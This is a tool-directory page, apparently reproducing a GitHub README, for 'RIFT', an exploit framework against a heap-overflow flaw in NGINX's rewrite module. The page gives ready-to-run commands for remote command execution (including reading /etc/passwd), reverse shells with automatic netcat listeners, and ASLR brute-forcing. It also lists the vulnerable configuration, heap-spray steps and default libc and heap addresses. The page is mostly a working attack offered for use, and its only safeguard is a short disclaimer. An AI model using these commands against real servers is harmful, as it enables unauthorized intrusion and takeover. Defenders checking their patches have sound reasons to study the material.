Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2026-42945 — 在 NGINX 的 ngx_http_rewrite_module 模块中发现一个缺陷。在特定的重写配置下,未经身份验证的攻击者可通过发送特制的 HTTP 请求来利用此漏洞。这可能导致 NGINX 工作进程中发生堆缓冲区溢出,进而可能实现任意代码执行。 | Kitploit
工具/GitHubGitHub/aratane/cve-2026-42945
侦察漏洞分析漏洞利用Web应用程序漏洞利用渗透测试命令与控制学习与教育Payload 开发二进制利用
GitHubaratane/cve-2026-42945

CVE-2026-42945

在 NGINX 的 ngx_http_rewrite_module 模块中发现一个缺陷。在特定的重写配置下,未经身份验证的攻击者可通过发送特制的 HTTP 请求来利用此漏洞。这可能导致 NGINX 工作进程中发生堆缓冲区溢出,进而可能实现任意代码执行。

11个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享
查看仓库

RIFT — 远程注入与故障触发

作者: Michael Sanji Winaya Prawiradibrata
AI 合著者: Varanus — sahabatku

针对 NGINX 的 ngx_http_rewrite_module 的堆缓冲区溢出利用框架。
一个集侦察与利用于一体的工具。零外部依赖。


仓库内容

文件描述
rift.py主工具。 侦察与利用合并在一个脚本中(1026 行)。
README.md本文档。

运行要求

  • Python 3.6+(仅标准库 — 无需 pip、无需 venv、无依赖项)

快速上手

root@kitploit:~
# 1. 全面侦察 — 检测版本、端点、漏洞、策略
python3 rift.py --target 10.10.10.10 --recon

# 2. 侦察 + 一次性利用
python3 rift.py --target 10.10.10.10 --auto --cmd "id"

# 3. 执行命令
python3 rift.py --target 10.10.10.10 --cmd "whoami"

# 4. 反弹 Shell(自动打开监听器)
python3 rift.py --target 10.10.10.10 --shell --lhost 10.10.14.5 --lport 4444

# 5. 使用 bash 的反弹 Shell(而非 python)
python3 rift.py --target 10.10.10.10 --shell --shell-type bash --lhost 10.10.14.5 --lport 4444

# 6. 仅检查是否易受攻击
python3 rift.py --target 10.10.10.10 --check-only

所有标志

使用模式

利用选项

侦察选项


特色功能

✅ 自动反弹 Shell

使用 --shell 时,脚本自动:

  1. 根据 --shell-type 生成反弹 Shell 载荷
  2. 在 --lport 上打开监听器
  3. 发送利用载荷
  4. 一旦工作进程崩溃 → 获得 Shell
  5. 自动监听器: 优先使用 netcat(nc -lvnp),回退至 Python 监听器

✅ 自动 ASLR 暴力破解

若默认地址失败,脚本自动滑动堆基址 ±5 步 × 0x10000,寻找匹配地址。无需手动设置。

✅ 多载荷反弹 Shell

4 种 Shell 载荷类型 — python、bash、nc、php。选择目标上可用的类型。

✅ 全面侦察

--recon 执行 5 个阶段:

  1. 指纹识别 — 检测 NGINX 版本、15 个常见端点、重写模块
  2. 信息泄露 — 错误页面中的内存地址、时间侧信道
  3. 端点测试 — 使用 6 种载荷测试端点行为
  4. 工作进程计数 — 根据延迟模式估算工作进程数量
  5. 策略建议 — 基于分析结果推荐行动方案

✅ JSON 输出

--output json 用于与其他工具集成或自动解析。


易受攻击的配置

利用目标为具有如下 rewrite + set 配置的 NGINX:

root@kitploit:~
location ~ ^/api/(.*)$ {
    rewrite ^/api/(.*)$ /internal?migrated=true;  # is_args = 1
    set $original_endpoint $1;                     # 长度计算使用 is_args = 0
}

后果:分配的缓冲区过小,URI 转义(3 倍扩展)导致溢出。

受影响版本

  • NGINX 开源版: 0.6.27 – 1.30.0
  • NGINX Plus: R32 – R36
  • 修复版本: 1.31.0、1.30.1、R36 P4+、R35 P2+、R32 P6+

利用工作原理

root@kitploit:~
1. 堆喷射 ─── POST /spray × 20 → 在堆中植入伪造的 ngx_pool_cleanup_s
2. 触发 ────── GET /api/AAAA...++++... → 通过 URI 转义溢出
3. 破坏 ────── 溢出覆盖相邻池的 cleanup 指针
4. 执行 ────── 池销毁 → 调用 system("command")

重要常量(可在 rift.py 中修改)


完整示例

命令执行 + 详细输出

root@kitploit:~
python3 rift.py --target 10.10.10.10 --cmd "cat /etc/passwd" --verbose

自定义地址(绕过 ASLR)

root@kitploit:~
python3 rift.py --target 10.10.10.10 \
    --cmd "id" \
    --heap-base 0x555555659000 \
    --libc-base 0x7ffff77ba000

多次尝试

root@kitploit:~
python3 rift.py --target 10.10.10.10 --cmd "id" --tries 50

侦察 + JSON

root@kitploit:~
python3 rift.py --target 10.10.10.10 --recon --output json

生成利用脚本

root@kitploit:~
python3 rift.py --target 10.10.10.10 --generate-exploit
# → exploit_10_10_10_10.py

故障排除

"目标似乎未运行 NGINX"

  • 检查端口:nc -zv <IP> 80
  • 尝试其他端口:--port 8080、--port 443
  • 可能位于 WAF/代理之后

"所有利用尝试均失败"

  1. ASLR 可能已启用 — 尝试 --auto 进行自动 ASLR 滑动
  2. NGINX 版本可能已修复(> 1.30.1)
  3. NGINX 配置可能不易受攻击(未使用 rewrite+set)
  4. 尝试 --verbose 查看每次尝试的详细信息

未连接到 Shell

  • 检查本地防火墙:sudo ufw allow 4444
  • 检查 --lhost — 确保本地 IP 正确
  • 尝试 --shell-type bash 或 --shell-type nc

免责声明

本工具仅用于教育和授权安全测试目的。
未经授权使用系统是违法的。

© 2026 Michael Sanji Winaya Prawiradibrata
AI 合著者:Varanus

下载工具
标志功能
--recon全面侦察。 指纹识别 → 信息泄露 → 端点测试 → 工作进程计数 → 策略建议。
--auto自动侦察 + 利用。 等同于 --recon 后继续利用。
--check-only快速检查。 检测 NGINX、版本、端点 /api/。
--cmd "command"通过 system() 执行单条命令。
--shell反弹 Shell — 自动打开监听器、发送载荷、接收连接。
标志默认值功能
--port80目标端口
--lhost—反弹 Shell 的本地 IP(使用 --shell 时必须指定)
--lport4444监听器的本地端口
--shell-typepython反弹 Shell 载荷:python、bash、nc、php
--heap-base0x555555659000堆基址(覆盖用于绕过 ASLR)
--libc-base0x7ffff77ba000libc 基址
--tries10每个候选地址的尝试次数
--verbose / -v—每次尝试的详细输出
标志功能
--fingerprint检测 NGINX 版本、端点、重写模块
--leak检查信息泄露(错误页面中的内存地址、时间侧信道)
--test-endpoint使用多种载荷测试端点行为
--endpoint待测试端点的路径(默认为 /api/)
--generate-exploit生成具有目标地址的专用利用脚本
--output json输出 JSON(机器可读),同时终端输出文本
常量默认值含义
BODY_LEN4000喷射请求体大小(字节)
N_SPRAY20每次尝试的 POST 请求数量
LIBC_SYSTEM_OFFSETS7 个条目不同发行版下 system() 的偏移量
PREREAD_HEAP_OFFSETS19 个条目堆偏移候选值
DEFAULT_HEAP_BASE0x555555659000堆基址(ASLR 关闭时)
DEFAULT_LIBC_BASE0x7ffff77ba000libc 基址(ASLR 关闭时)